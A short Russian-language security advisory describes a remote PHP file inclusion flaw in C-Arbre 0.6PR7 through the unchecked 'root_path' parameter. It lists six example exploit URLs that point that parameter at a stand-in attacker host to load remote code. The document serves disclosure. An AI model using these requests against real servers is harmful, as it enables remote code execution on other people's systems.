Хакер #305. Многошаговые SQL-инъекции
Программа: C-Arbre 0.6PR7
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «root_path» множественными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://www.target.com/[C-Abre_path]/lib/Richtxt_functions.inc.php?root_path=http://attacker.com/evil?
http://www.target.com/[C-Abre_path]/lib/adddocfile.php?root_path=http://attacker.com/evil?
http://www.target.com/[C-Abre_path]/lib/auth_check.php?root_path=http://attacker.com/evil?
http://www.target.com/[C-Abre_path]/lib/browse_current_category.inc.php?root_path=http://attacker.com/evil?
http://www.target.com/[C-Abre_path]/lib/docfile_details.php?root_path=http://attacker.com/evil?
http://www.target.com/[C-Abre_path]/lib/main.php?root_path=http://attacker.com/evil?